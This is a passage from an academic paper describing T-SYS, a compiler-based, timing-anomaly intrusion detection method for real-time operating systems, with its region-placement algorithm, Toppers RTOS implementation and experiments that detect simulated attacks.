points along execution paths into code. Any intrusions resultingin execution time exceeding the WCET budget between two in-strumentation points will be detected, which limits the code of suchinjectionsinlengthtoaso-called windowofvulnerability correlatedtothelongestWCETpathbetweeninstrumentation points.TheMaximumVulnerabilityThresholddefinestheupper bound of this window of vulnerability , which will be tolerated by the compiler-based integration tool, and is determined by the user. A number of WCET-based protection methods have been pro- posed[10,34,35].WecompareT-SYStoBellecetal.[ 10],asthey developed an algorithm to identify regions, for each of which tim- ing is tracked in order to identify intrusion by detecting anomalies. However, the criteria used to divide code into regions, as well as therequirementsforregionstructure,arevastlydifferent.Where theBellecalgorithmutilizessingle-entry/singleexitnestedregions, T-SYS allows for multi-exit regions; Bellec creates a hierarchy of nestedregions requiringstackmaintenance oftimedcontext data while T-SYS neither requires regions nor a region stack. What s more, T-SYS supports elastictiming requirements determined prior tocompiletime,facilitatedbyourROSEcompilertoolforplacing instrumentation points. This elasticity allows the user to choosea desired level of protection based on application requirements insteadofBellec srigidone-sizedregionsdeterminedbycontrol- flow shape. We also develop transformations to loop structures to further reduce overhead. Bellec relies on a hardware monitor to track the cycle count withinaprogram,andtherebydetecttiminganomalieswithzero performance overhead. With a similar hardware design, T-SYS overheadcouldalsobereducedtozero.AfurtherdescriptionoftherequirementsforT-SYShardwareis giveninSection 4.However,as 2472022 ACM/IEEE 13th International Conference on Cyber-Physical Systems (ICCPS) 978-1-6654-0967-4/22/$31.00 2022 IEEE DOI 10.1109/ICCPS54341.2022.000292022 ACM/IEEE 13th International Conference on Cyber-Physical Systems (ICCPS) | 978-1-6654-0967-4/22/$31.00 2022 IEEE | DOI: 10.1109/ICCPS54341.2022.00029 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:42:54 UTC from IEEE Xplore. Restrictions apply. such hardware does not exist in practice, experiments in this paper wereconductedusingsoftwareimplementationsofbothT-SYS and Bellec smethodsassessingoverheadsforinstrumentationpoints. Thisalsoprovidesanindicationofcostforarealisticdeployment of such intrusion protection. The primary contributions of this work are: T-SYSisdeveloped,anovelmethodfortiming-based protection across user and kernel boundaries. A compiler-based tool for automatic integration of elastic T- SYS instrumentation points is algorithmically developed. AprototypeimplementationofT-SYSisrealizedinanexisting Autosar/OSEK-compliantRTOS,aswellasinavarietyofexisting real-world CPS benchmark task sets. Experiments comparing T-SYS to existing WCET-based se- curity methods are conducted, comparing their ability to detect malware attacks, as well as their performance impact compared to the unmodified kernel and previous timing-based security method. TheyshowclearbenefitsofT-SYSoverpriorworkintermsoflower overhead, user-configurability and elasticity. 2 RELATED WORK As cyber-physical systems have become increasingly important to 24/7 operations of critical infrastructure,so has the importance of protecting them against cyberattacks [ 13,23]. In response to the increasingprevalenceofandneedforsecurityinrealtimesystems,anumberofnewideashaveemergedtomeettheuniquechallenges of real-time security. This section aims to provide an overviewof existing contributions to security in the domain of real-time systems, with particular focus on methods that incorporate timing informationaspartoftheirprotection.Thepurposeofthisoverviewistodeterminewhatoptionscurrentlyexistforprotectingreal-time systems, and what problems in the field T-SYS is best suited for. Priorworkonintrusiondetectioninreal-timesystemshastaken avarietyofapproaches[ 12].Manyofthesemethodsarefocused onincreasingsecurityatthenetworklevel,astheincreasinguse of networks in real-time systems presents an expanding attack surface[28].Whileconventionalandembeddednetworkprotection methods complement T-SYS, the most closely related methods are based on the principle of intrusion detection via timing anomalies. These methods leverage the unique timing constraints inherent to real-timesystemsasameanstoidentifyattacks.Designingareal- timesysteminherentlyentailsgatheringtiminginformationonthe variouscomponentsthatcompriseit[ 4].Sincesufficientlycomplex attacks are liable to generate timing anomalies, some protection methodsincorporatethisinformationintotheirintrusiondetection strategiesby identifyingtiminganomalies [ 31].It isthiscategory that T-SYS falls into. Bellec et al. [ 10] created a protection method that employs a region-based approach, tracking the time spent executing regions. Their method employs specialized hardware to monitor execution. TheregionsusedbyBellecaresingle-entry,single-exitnestedre- gions. The hardware tracks execution through these regions by monitoring the a cycle count-down register initialized upon region entryandtracksnestedregionsviaastackstructurewithassoci- ated timer save/restore operations. They also provide an algorithm for automatically dividing target code into regions based on thecontrol-flow graph of the code, which we compare T-SYS to in Sec- tion 7. T-SYS differs in its criteria for region selection (non-nested, single-entry/multi-exit), as well as in providing elasticity in its timingboundsthroughtheMaxVulnparametertodeterminethe largest allowable region size. Zimmer et al. [ 34] developed a set of methods for providing securityinanRTOSexploitingprecisetiminginformationtodetect attacks. T-Rex is a checkpoint based system that relies on fine- grained timing information (single clock cycle resolution) to detect bufferoverflowattacksonfunctionreturnandotherstraight-line execution paths of application code. T-ProT is a coarser-grained protectionusingsynchronouscheckpointstovalidateforeachtask that a milestone in execution in reached by some expected time. T-AxTisintegratedwiththeschedulerandsupportsasynchronous, periodic checks of a task s program counter value, to ensure that it is within the appropriate range. Of these, T-SYS is most outwardly similar to T-ProT in that both use timers to bound a block of code. However, T-ProT implements itstimercheckpointsviaschedulerinvocations,whileT-SYSuses function calls to instrument code. This allows T-SYS to provide integratedprotection withinbothapplicationandkernelcodeand across their intersection instead of just application code, which cre- ates novel challenges in that the control flow of a protected region may originate in the context of one task but lead to that of another task. T-SYS also supports elastically sized vulnerability windows as opposed to more the rigid constant sized regions of T-ProT. Traditionally, the effect of kernel paths in real time systems has been estimated fairly pessimistically [ 22], taking the WCET of the syscall to be that of the longest path the call could possibly take throughthekernel.Priorwork[ 15]hasmodeledRTOSkernelpaths using control-flow graphs (CFGs). These CFG models were then in- tegratedwiththeexistingCFGoftheuserspaceprograms(crossingthekernel-applicationboundary)tocreateamorecompleteCFGof theusertask.Byincludingkernelpaths,previously-independent CFGs of different tasks could be connected, thereby creating a whole-system CFG. Methods of WCET analysis have been developed to tighten boundsbyincorporatingsystemstateinformationprecedingsys- temcalls[ 16].Informationaboutsystemstatesiscombinedwith prior analysis of individual kernel paths WCETs as well as the conditionsfortakingthesepaths.Incombination,suchinformation yields tighter bounds on the response time of system calls and, transitively, application tasks. 3 ATTACK MODEL AND SCENARIO Thereareamultitudeofwaysinwhichreal-timesystemscancome under attack. Much of the research in real-time security focuses on identifying attacks at the network level [ 19,21]. In this work, a generalmodelispresentedforboththeattackthatT-SYSisdesigned to detect, together with a model for the system itself, with a focus on defining how the kernel handles interrupts and what hardware features are made available. We assume the existence of a high-precision monotonic counter providedbythehardwareandavailabletobe programmedbythe kernel.Thiscounteriswrite-protectedandcanonlybemodified viaakernelcallpreventinganattackerfrombeingabletomodify it without returning to the kernel. 248 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:42:54 UTC from IEEE Xplore. Restrictions apply. Wefurtherassumethattheattackerhasmanagedtocompromise theuserdataspace.Theattacker sgoalistohijackthecontrolflow ofthesysteminordertoexecutemaliciouscodeunderelevatedper- missions, and then return undetected. We assume that the attacker cannotmodifyhardwarefactorsorprotectedkernelmemory.An attackerundertheselimitationsmaystillbeabletodivertkernel execution,e.g.,bytriggeringabufferoverflowwithinkernelcode. 4 DESIGN The primary objective of T-SYS is to detect intrusions, thereby allowingthesystemtorespondrapidlytosuchanintrusion,e.g., by switching into a safe mode or shutting down a node entirely buttheexactresponsetotheattackisoutsidethescopeofthis paper.Ourapproachtointrusiondetectionreliesontrackingthe executiontimeofcoderegionsduringruntime,anddetectingwhen a region s execution time has exceeded its statically-determined WCETbudget.Coderegionsareboundedbyinstrumentationpoints (IPs).Theuseof worstcase executiontimetoconstructthesebounds (over less pessimistic estimates) is paramount, as by definition a code region s execution time will never exceed its WCET. Thus, we can assume that a region exceeding its WCET bound indicates the presence of an attack. The algorithms for generating regions (andtherebyplacingIPs)fromacontrol-flowgraphannotatedwith WCET information and with an elastic timing bound are discussed in Section 5. In a software-based implementation, IPs are implemented as systemcallswheninsertedintoapplication-levelcode,andassimple function calls when added inside kernel paths. This provides the necessarylevelofdataprotectiontotheIPcodebyensuringthat importantdata(e.g.,timingboundsorIPreturnaddresses)reside in a different address space than application code, reducing anattacker s ability to tamper with this information. In a hardware implementation,adedicatedcomponenttrackstheprogramcounter and executes all the functions of the IP (setting up timer, raising alarm)once thePCreachesanIP withoutextracode addedtothe application or kernel path. In this paper, we focus on a software implementation of T-SYS since it is applicable to today s hardware as implemented in our experimental evaluation. 4.1 Protection Model T-SYSidentifiestiminganomaliesalongexecutionpaths.Execution paths are represented as regions of contiguous basic blocks within thesystem scontrolflowgraph,havingasingleentryandoneor moreexitpoints(incontrasttomoreconstrainedsingle-exitcontrol flow [10], which does not match C/C++ control flow with break within loops). As every basic block within the CFG is associated withexactlyoneregion,successorsofanexitpointofoneregion represent entry points for a subsequent regions. Execution time is tracked via IPs placed at region boundaries. Because regions arepairwise disjoint with an empty intersection in basic blocks (in contrast to nested regions [10]), each IP is associated with exactly oneregion.Figure1showsasampleCFGwith4IPsandcolor-coded regions associated with each one. At each IP, a timer with a deadline equal to the longest path throughtheassociatedregionregion(i.e.,thelongesttimebefore reaching another IP) is set up. IPs are placed at the beginning ofthe first block in a region. Notice that program profiling/tracing [ 6, 8,9,20] places instrumentation in a basic block anywhere within a path,andoftennotatthetop,whichisoneofseveraldifferences between T-SYS and profiling/tracing). Concrete rules for dividing a CFG into regions are discussed in Section 5. Figure 1: CFG with WCETs per block, regions denoted bycolor, with instrumented blocks labeled by letter, wherepathWCETtablecontainstimeoutdeadlinesforeachregion. Figure1showsaCFGwithIPs , , and ,alongwithWCETs per basic block. The table to theright shows the WCET bound for each IP. On encountering point , the next IP reached could be either or , where it reaches in either case after 15ms (the length of s basic block). Both blocks directly following contain IPs. As IPs are always placed at the start of a block, the length of the containing block is included. For , the same case is seen with a WCETof35ms.Atpoint ,however,therearetwopathsto ,with WCETs of 10ms and 25ms, respectively. The longest of the possible paths defines the IP deadline, so the timer at is set to 25ms. Considertheeffectofexecutinginjectedcodeofanattackthat divertsfromtheexpectedcontrolflow.UponreachinganIP,acallis madetosetupatimer,withadeadlineequaltotheWCETdistance to the next IP. When the control flow is diverted off the path to thenextIP,executioncontinues untilthetimer deadlineisreached. When this happens, an interrupt is triggered, flagging an intrusion. Withnodiversion,thenextIPwouldbereachedbeforethedeadline, andthetimerwouldbereprogrammedwithanewdeadline.Also consideranattackusingasuspend-and-resumestrategy,wherethe attack is split up into multiple parts, suspending its own execution and returning to the diverted region to avoid allowing the total re- gionexecutiontimetoexceedthetimerdeadline.Inthiscase,every fragment of the attack would need to fit within the vulnerability window for the region. Given that the size of this window changes each time the region is executed (due to caching or control flowdifferences), the attacker would need to guarantee that they are always diverting back to the region with enough time left to finish execution within the deadline. 4.2 Interrupt Handling Considerauser-leveltaskexecutinginasysteminvolvingmulti- pletasksofvaryingpriorityinapreemptivelyscheduledsystem. The execution of application code may be interrupted and then temporarilysuspendedwhileexecutionistransferredtoahigher- priority task. In general, the exact time and the location in the applicationwheretheinterruptoccurscannotbestaticallydeter- mined as preemptions may be asynchronously triggered. 249 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:42:54 UTC from IEEE Xplore. Restrictions apply. To account for asynchronous actions, it is necessary for the operating system s interrupt handler to interface with the T-SYS timerwheninterruptingaT-SYSprotectedtask.Whenaninterrupt arrivesduringtheexecutionofaT-SYSprotectedapplication,the remaining time left for the current timer is recorded in kernel (i.e., protected) memory. The timer is then canceled before the rest of the interrupt is processed. Similarly, when returning execution to a protected task, the interrupt handler must reinstate the T-SYS timer with the recorded remaining time plus some constant to account for the overhead associatedwithhandlingtheinterruptbeforethetimerispaused, as well as for returning from the interrupt after resetting the timer. However, this overhead is constant and can therefore be directly creditedtotheT-SYStimerwithinthetimerresumeoperation.IfT- SYSisintegratedintothekernel,theinterrupthandlermaycontain an IP that sets up a new timer to protect a kernel region, e.g., to handletheinterrupt ortocallthedispatcher.Thiscase isdiscussed further in Section 6. 4.3 Instrumentation Points AteachIP,thereturnaddressisreadfromthecallstackandchecked for validity against a table of known valid return addresses. Ifinvalid, an attack is flagged by raising an alarm. Otherwise, thereturn address is used to extract the IP s unique ID by indexing intothe pathWCET table,whichcontainstherelevantregionWCETs (and thus relative timer deadlines) for each IP. The pathWCET table is stored in protected kernel memory, and its contents are hard- codedatcompiletimebytheROSE-basedimplementationtool.A timer is then set up for this deadline. This timer setup operation also cancels the timer for the previous IP encountered. Pseudocode for implementation points is shown in Listing 1. Listing 1: Instrumentation Point Pseudocode void inst_point(): ret_addr = get_return_address() if !is_valid_addr(ret_addr){ alarm() } point_id = get_pid(ret_addr) current_time = get_timestamp() deadline = current_time + p athWCET[point_id] setup_timer(d eadline) IPs are represented in application code as system calls, and in kernelcodebysingularfunctioncalls.Thereturnaddresschecking preventsattackersfromevadingdetectionbyinsertingtheirown IPs into malicious code. Since the return address is unique to each IP, it can be extracted at compile time. 5 PLACEMENT OF IPS Atooltosupportautomaticallyimplementingprotectionintoar- bitrary code, both user and kernel, is provided. To this end, theROSE [ 27] compiler framework was utilized to create an instru- mentation tool from a specification that incorporates previouslyacquired timing information, control-flow analysis and a vulner-ability threshold, . This tool automatically divides the controlflowgraphofagivencodebaseintoregionsbasedontheuser-specified maximum vulnerability threshold, , and places IPs in desired locations throughout. Use of user-specified parameter supports elasticity with respect to instrumen- tation granularity.Furthermore, thistool is capableof performing loop transformations to reduce the overhead of instrumentation. Aprerequisiteforutilizingourinstrumentationtoolisthatthe developer has extracted worst-case execution time informationfor each basic block in the system. The difficulty of this processis largely dependent on which method is used to acquire basicblock WCETs. Extraction of timing information was performed experimentally for this work, but other implementations of T-SYS may use any method available, including static WCET analysis tools[32].T-SYSisagnostictohowbasicblockWCETsareextracted and will work with any method, so there is no need to specify a precise method for determining the WCET of a basic block. Ourtoolprovideselasticinstrumentation,whichtakesthegranu- larityofinstrumentationasaninputintermsofcyclestodenotethe vulnerability threshold. This allows the user to directlyspecify the minimumfrequencyofIPsratherthanderivingthisvalueindirectlyfromotheruserparameters,asisthecaseinothermethods[ 10,34]. Thetoolalsosupportsbasicblockinstrumentation(bysimply treating every block as a separate region), which we used as a first- order approximation of WCET bounds, later refined in a second-order pass over regions with multiple blocks. This step achieves much tighter bounds on the WCET of each region. 5.1 Placement Algorithm ToplaceIPs,allbasicblockswithinaCFGareassignedintocontigu- ous regions. Each region represents a section of code over which a giventimerwillbeactive.Fromhereon,werefertopartitioning the CFG into regions as coloringit; blocks of the same region share a color, which is unique to that region. Regions created must fol-low a particular set of rules governing their structure to support instrumentation placement for timing protection: Abasicblockmustshareitscolorwitheitherallofitschil- dren, or with none of them. Abasicblockmustshareitscolorwitheitherallofitsparents, or with none of them. A region may have only one entrance block. The WCET of the longest path through a region must not exceed the threshold. must be greater than or equal to the WCET of the longest basic block. (If finer granularity was needed, one could even dissect a block into multiple blocks.) By these rules, a single basic block may constitute a region. Once the CFG is partitioned into regions, an instrumentation pointisplacedatthebeginningofthefirstbasicblockperregion. Suchablockexistsbecause,aspertheregionstructurerequirementsdefinedabove,eachregionwillhaveasingleentrypoint.Placement is always performed at the top of a basic block for two reasons: 1) Placement in the middle of a basic block would divide the executiontimebetweentworegions,butgiventhattiminginforma- tion isstored at thegranularity of singlebasic blocks, itwould be unclearhowthistimeshouldbedividedup.2)Placementattheend ofabasicblockwouldbecomplicatedduetobranchinstructions whose time needs to be accounted for, yet the IP cannot be placed after them since they affect the program counter. 250 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:42:54 UTC from IEEE Xplore. Restrictions apply. In order to properly handle loops within a given CFG, a prepro- cessing step is necessary during which each loop is represented as a single (compound) block. In the event that the loop s total WCETislargerthan ,thecompoundblockwillinitially be treated as having an indefinite WCET. (We use this property in our algorithm to force it being treated as its own region when first creating regions.) Once the remainder of the CFG has been divided intoseparateregions,theloop sCFGwillthenbepassedintoour algorithm as a single compound object (without further internal analysis). Loopboundsareexpectedtobestaticallybounded,eitherexplic- itly by a constant bound that can be statically evaluated at compile time or by user hints/pragmas to provide such a constant. For such constantnumberofiterationsofaloopandatotalWCETnotex- ceeding ,thecompoundblockwillbetreatedashaving thesameWCETastheloopitrepresents.Intheeventthattheloop bounds are not available (and thus cannot be evaluated at compile time), the algorithm will assume the loop s total WCET is larger than andthusfollowthebehaviorforlongloopsoutlined in the preceding paragraph. In addition, the loop structure maybe transformed into a semantically equivalent one to ensure low instrumentation overhead, which is discussed in subsection 5.5. Once this preprocessing step is complete, the CFG is partitioned according to the 3-step algorithm outlined below: (1)Regions are created delimited by dominator and post- dominator blocks, which are uniquely colored with respect to other regions.1 (2)Allinteriorblocksofaregionbeyondthedelimiterblocks are colored with their region color. (3)Regions are combined within the threshold and region property requirements to reduce the total number of regions and thus instrumentation overhead. Pseudocodeoftheplacementalgorithmisgivenintheappendix, alongwithaproofsketchforcorrectnessandacomplexityanalysis. Figure 2 depicts the coloration of a control flow graph after eachstepinthepointplacementprocess.TheCFGdisplayedwas taken from the ext_tsk kernel path, a portion of the scheduler within the Autosar/OSEK-compliant Toppers RTOS [ 33], which was instrumented as part of the evaluation in Section 7. 5.2 Partial Regions In the step, only some of the blocks in the CFG are coloredin;othersareleftuncolored,withnoregionmembership. The objective of this step is to generate single-entry, single exit regions within the CFG. Adepth-firsttraversaloftheCFGisperformed.Ateachuncol- oredblock ,alistofthenode spost-dominators, ,isacquired. Any block in that does not have as a pre-dominator is removed from . The resulting pruned list is then sorted by distance from (where distance represents WCET),with the fur- thestentryfirst(theremainingblocks,ifany,canbeorderedthis way [26], as the furthest block will also be a post-dominator for 1A dominator block in a CFG indicates a prior block execution must have passed through to reach the current block, whereas a post-dominator indicates a block ex- ecution will have to pass though after leaving this block, i.e., these blocks denote must-information [5]. Figure2:CFGaftereachstepincoloringregionsoftheCFG for the Toppers scheduler allearlierblocksinthelist).Foreachremainingblockin , , a depth-first algorithm is used to determine the longest path (intermsofworstcaseexecutiontime)between and .Ifthecom- putedregionWCETislessthanthe parameter,thenall oftheblocksbetween and areassignedasinglecolor,andthe depth-first traversal of the CFG continues from . In the event that none of the blocks in pass the criteria above(i.e., isnotadominatorforanyofitspost-dominators,orno post-dominatorisfoundwithalongestpathoflessthan ) or hasnopost-dominator,noblockswillbecoloredandthedepth- first traversal of the CFG continues. This process is complete once everynodeintheCFGhasbeenchecked.Asseeninthefirstgraph of Figure 2, only some blocks are colored after step 1 (here, 40% of theblocksarecolored.Uncolorednodesareshownaswhite,withablackbackground).Listing2intheappendixshowsthepseudocode for the Partial Regions step. 5.3 Filling Regions TheFillingRegionsstepcolorsallremainingblocksthatwereleft uncolored by the previous Partial Regions step. This eventually results in a fully cornered CFG. The methods begins with a depth- firsttraversaloftheCFG.Whenanuncoloredblockisencountered,itiscolored.Aftercoloringablock,anattemptismadetogrowthe new region by painting all of its successors with the same color. This attempt can only succeed if, for every successor , is uncolored, hasnoparentsofadifferentcolorthan (includinguncol- ored blocks), and adding to the region will not create a path through the region that exceeds . Theserulesensurethatanyregioncreatedinthismannerwill (1) not interfere with the regions created in the previous step, and (2)willobeytherulesforregionstructuredefinedpreviously.Ifthe growthattemptsucceeds,allsuccessorsobtainthepredecessor s color, and growth attempts start for each newly-colored block in a breadth-firstfashion.Ifthegrowthattemptfails,thenthealgorithm resumes looking for uncolored blocks to start new regions. 251 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:42:54 UTC from IEEE Xplore. Restrictions apply. ThesecondgraphinFigure2depictsthestateoftheCFGafterthe FillingRegionsstepiscomplete.Notethateveryblockinthegraph has been colored at this point. The previously described process corresponds to the pseudocode in Listing 3 within the appendix. 5.4 Region Adjustment The final phase of loop adjustment, Region Adjustment, optimizes the graph to reduce the number of IPs placed. This reduces the re- quiredsizeofthe table,whichalsoreducesperformance in a software implementation of T-SYS (where IPs have associated execution time overhead). Region Adjustment uses the same dominator/post-dominator pairmethodfromthePartialRegionssteptoidentifypotentialre- gions.However,onlyregionexitblocksthatdonotshareacolor with any sibling blocks (i.e., successors of the block s predeces- sor) are checked as possible new entry points. If a viable region is identified, then a check is performed to determine if creating the new region will reduce the total number of regions within the CFG. If so, then all blocks within the region are repainted a new colormakingthempartofthenewregion.Thecheckforreduction simply involves counting the number of unique colors identified amongtheprospectiveregion sblocks.Ifitismorethan3,orifthenewregioncontainsasupersetoftheblocksinatleast2regions(as isthecaseinFigure2),thenthechecksucceedsandtheregionis created. Pseudocode for this is shown in Listing 4 in the appendix. We refer to this algorithmic approach of delimiting as elasticallysizingregions:Ourautomatedprocessallowsuserstocall theinstrumentationtoolwiththeirpreferred threshold, which could even differ from task to task depending on a task s real-time criticality. 5.5 Loop Transformation by Thresholding Theprocessofinstrumentingloopsopensupaninterestingprob- lemwithregardtothecostofIPs.Specifically,howcanaloopbe efficiently instrumented when multiple loop iterations can pass withinthe timelimit,butthetotalnumberofiterations makes the loop exceed ? When a single loop iteration canbelongerthan ,theloop sinternalstructurecanbe instrumentedusingthe3-stepmethodfromabove.Butthe3-step method does not allow IPs to occur on every k-th loop iterationdue to the region constraints. Instead, each loop iteration would trigger an IP, which increases T-SYS overhead. Our solution to this problem is to transform the loop into a nested loop with a single IP on top of the outer loop and all ofthe logic of the untransformed loop placed in an inner loop. Webound the number of inner loop iterations such that it will not exceed . We limit loop transformations to loops with stat- ically known iteration bounds so that the transformation can be performed at compile time. An example of this transformation s effect of the loop CFG is depicted in Figure 3. The blue segment represents the originalloop. The outer loop (orange segment) contains an additional IP (highlightedinyellow)andaconditionalbranch(enclosedingreen) that determines the number of inner loop iterations to executeon a given iteration of the outer loop. The dynamic number ofinstructions increases slightly due to upper bounds calculationsfortheinnerloop,butthisoverheadiseasilycompensatedbythe lower number of IPs. Figure 3: CFG of a loop before and after the loop threshold-ing transformation Consider an untransformed loop with iterations, where at least iterationscanexecutewithinthe timelimit.After the loop transformation, the resulting outer loop will iterate times, where =/floorleftbig /floorrightbig +1. The inner loop will iterate = times, except for the final iteration of the outer loop, where = ( 1). The valueof on thefinal outer loop iterationmay be lower than during others to account for the case is not an integer multiple of . Handling this case is the reason for including the conditional statement within the outer loop. Note that the calculation for must take into account the addi- tionaltimespentcallingtheIPandexecutingthebranchstatement as well as the outer loop return, and so will be smaller than the exact value of divided by the iteration WCET. 5.6 Generation of IPs OncetheprocessoftransformingloopsandpartitioningtheCFG into regions has completed, we may begin actually placing in-strumentation points into the code. First, the completed CFG isre-formed by expanding any loops that were reduced to a single compound block and instrumented separately back into their orig- inal form. Subsequently, a single function call is inserted to theIP function at the beginning of every basic block that does notshare a color with its parents (i.e., the beginning of each colored region).Inaddition,atableisgeneratedrelatingeachIPtoitsas- sociated region s WCET. This WCET data is then populated intothe table(seeSection4),whichisstoredinprotected kernel memory. 6 IMPLEMENTATION WeimplementedthedesignusingtheROSE[ 27]compilertogener- ateaT-SYSinstrumentationforuser/kernelsourcecodeandsubject it to timing experiments with different parameters ex- ploiting the elasticity of our tool. We utilized an Autosar/OSEK-compliant [ 2,3] RTOS, Top- per[1,29],thatiscommerciallydeployedbySuzuki(amongothers) 252 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:42:54 UTC from IEEE Xplore. Restrictions apply. for automotive systems adhering to ISO 26262 [ 18] and MISRA- C[24]requirements.Inparticular,weemploytheToppersRTOS (EV3RT)versionwithavailablesourcecodetargetinga32-bitARM 9 processor clocked at 300 MHz featuring 16 KB instruction and 16 KB data caches in experiments [30]. We created a software implementation of T-SYS within Toppers, including allof the components outlinedin Section 4. Syscallsfor application-embeddedIPswereadded,alongwithreservedspace for the pathWCET table. Modifications to the interrupt handler were made in order to handle pausing and resuming timers for interrupted tasks. Actualtool-basedintegrationofinstrumentationpointswasper- formedonseveralCPSbenchmarkapplicationsaswellaswithinthe Toppers kernelitself inorder to ensureprotection across theuser- kernelboundary.Implementationswereperformedusingvarious levels.Thetasksetsinstrumentedincludedaselectionof tasksfromPapaBench[ 14,17,25]withbenchmarksfromtheopen- source Paparazzi UAV codebase and selected Malardalen WCET Benchmarks.AllinstrumentationofIPsinkernelandapplication code was performed using our ROSE-based placement tool. Ahigh-precision,write-protectedmonotoniccounterisarequire- mentforT-SYS,asdiscussedinSection3.Mostexistinghardware platforms provide components that meet this need [ 12]. Toppers does not innately provide such a device, however, the AM1808 processor of the hardware platform used for testing features an eCAP (enhanced CAPture) module, which can be configured to act asamonotoniccountertogenerateaninterruptuponreachinga programmabledeadline[ 30].Thisdevicewasusedinourimplemen- tationofT-SYSwithinToppers.Inthegeneralcase,thedifficulty ofaddingsupportfortheT-SYStimerwilldependontheprecise detailsofthesystembeingmodified.Inparticular,ifthetimerhard- wareisalreadyemployedbytheRTOSforanotherpurpose,then additional modifications will be needed to multiplex it so as to add T-SYSsupportwhileretainingexistingOStimers.IntheToppers case, the eCAP module was not being used, so modifications were straightforward. Modifications to the Toppers interrupt handler were made to handlepreemptionsofT-SYSprotectedtasks.Thetaskcontrolblock (TCB)structurewasextendedwithafieldtostoretheremaining timerbudgetattimeofinterruption.Thetimerisreinstatedupon task resumption, using the remaining budget time plus a constant amountofadditionaltimetoaccountfortheoverheadassociated withtheinterrupthandlerdivertingexecutionbeforeprocessing the timer pause. The additional time required was measured at 25 cyclesinourimplementation.UsingtheTCBtostoreT-SYSrelated data is safe as the TCB is part of kernel (i.e., protected) memory. Incasethataninterruptinitiatedaninstrumentedkernelpath, the T-SYS timer is recorded, and the diverted execution reaches an instrumentationpointwithinthehandlermarkingtheentryinto the protected section of kernel code. By recording the timer, we can credit the known execution time of the kernel path back to the task upon returning from the interrupt. In the event that a context switch occurs during the kernel path (as would be likely during a scheduler interrupt), everything up to thedispatcherisconsideredpartoftheinterruptedtask sexecution. Once the dispatcher is invoked, the timer s budget is recorded again, inorder tobe replaced(and creditedwith theneeded extratime)once wereturn fromthe dispatchedtask.Another crediting operation is issued upon return from the interrupt back into theinterruptedusertask,usingtherecordedtimervaluefromwhen the interrupt first arrived. Inaddition totheminimum support requiredforhandling pro- tected applications (i.e. syscalls for instrumentation points & other modificationsmentionedabove),kernelpathsrelatedtomutexhan- dling and those related to context switching were instrumented by applyingT-SYSprotectionacrossthekernel/userboundarytoen- sure end-to-end protection across the runtime of an entire task set. Theinstrumentedkernelpathsconstitutedtaskentry/exit,mutex lock/unlock operations, and scheduler interrupts. 7 EXPERIMENTAL EVALUATION The elasticity of the placement algorithm described in Section 5 supports experiments for a variety of applications with different timing requirements to be instrumented using a varying parameter to conform to the timing bound requirements of eachapplication. Our experiments focus on demonstrating the abilityof T-SYS to detect timing anomalies using simulated intrusions. These experiments were performed using benchmark task sets and feature detection at both user and kernel levels. WeselectbenchmarksfromtheCPSPapaBenchsuitewithmi- nor modifications to adhere to the Toppers kernel API, and addi-tional benchmarks from the Malardalen set. PapaBench is based on the real-world Paparazzicode base, an open-source framework for UAVs (e.g., quad-copters). It provides a good testing ground for emulating the protection methods behavior in a realistic envi- ronment,particularlyintherealmofcyber-physicalsystems.We modifiedPapaBenchtomakeitcompatiblewiththeToppersRTOS. PapaBench features precedence constraints, data exchange, syn- chronizationandcontextswitchesbetweentasks,whichallowed ustotesttheeffectivenessofT-SYS protectioninsidethekernel, as well as within user tasks. The Malardalen tasks were used for comparisontotheBellecalgorithm(asitwastestedusingthesame Benchmarks). PapaBench tasks were run together as a real-time taskset,astheyshare mutex-protecteddata,whiletasksfromthe Malardalenbenchmarksetwererunseparately(i.e.,onetaskinthe system at a time). We further compare our T-SYS implementation with Bellec et al.[10].Ouranalysiscomparesintrusiondetectioncapabilitiesas wellasnumberofinstrumentationpointsexecutedatruntimefora software instrumentation of both. Notice that the Bellec algorithm is rigid while T-SYS supports elasticity in the maximum allowed vulnerability. Because of this, we use the rigid Maximum Attack Width (MAW) value by Bellec as a base value for each benchmark.Wethenpresentadditionaldataformultiplesofthis value to demonstrate benefits of T-SYS elastic nature. Tasks from PapaBench which were instrumented include servo_transmit, send_data_to_autopilot (shortenedto autopilot),and navigation.ThesemodifiedPapaBenchtasksincorporatecontext switchesandmutualexclusion lockstofacilitatetaskcommunica- tion.ThesepropertieswereusedtoassessT-SYS abilitytodetect intrusions to the kernel. Benchmark tasks from the Malardalen set werefft, cnt, lms, st, edn, statemate, and qsort-exam andadpcm. For both benchmark sets, we also assessed the sensitivity to timing 253 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:42:54 UTC from IEEE Xplore. Restrictions apply. Figure 4: Minimum attack vulnerability vs. for Malardalen tasks. Figure 5: Minimum attack vulnerability vs. for Pa- paBench tasks. overhead induced by T-SYS analyzing performance under different levels. 7.1 Attack Detection Experiments TheseexperimentsdemonstrateT-SYS efficacyindetectingattacks while monitoring the time of protected regions under execution, both within and outside the kernel. As defines the upper bound on T-SYS timer deadlines, it is impossible for an attack with an execution time greater than to go undetected (see Section 4). These experiments focus on determining the longest attack that capable of bypassing T-SYS for a given level. Simulated attacks were conducted against T-SYS protected tasksusingvarious values.Thesesimulatedattackswere conducted by inserting function calls with known execution times into the tasks afterinstrumentation. Attacks were always placed immediately after the IP at the top of the longest region in thetested task or kernel path. This is the worst case for an attack to occur, as it gives the longest time window for the attacker. Byvaryingthelengthoftheintrudingfunctioncalls,wesimulate attacksofdifferentlengths.Thiswasleveragedtoassesshowthe parameter affects attack detection.Thus, for each value of shown in the table, the simulated attack length was increasedin5 secsincrementsuntilanattacklengthwasfoundthat alwaysresultedinintrusiondetectionafter100attackattempts.The simulation of kernel attacks (Figure 6) followed the same principle. The results of this experiment are depicted in Figures 4 and 5. Theresultsshowthatincreasing leadstoanincreasein theminimumobserveddetectableattackinmostcases.Thisreflects an increase in the size of protected regions and their variabilityin execution time. If the gap between BCET and WCET is large,attackers have an easier time intruding as less time spent insidethe loop provides more slack for the attacker to exploit: As longas the execution time of the original code plus that of the attack does not exceed the region s WCET, the attack will not trigger any alarms. As is increased, regions encompass more basic blocks with larger differences between 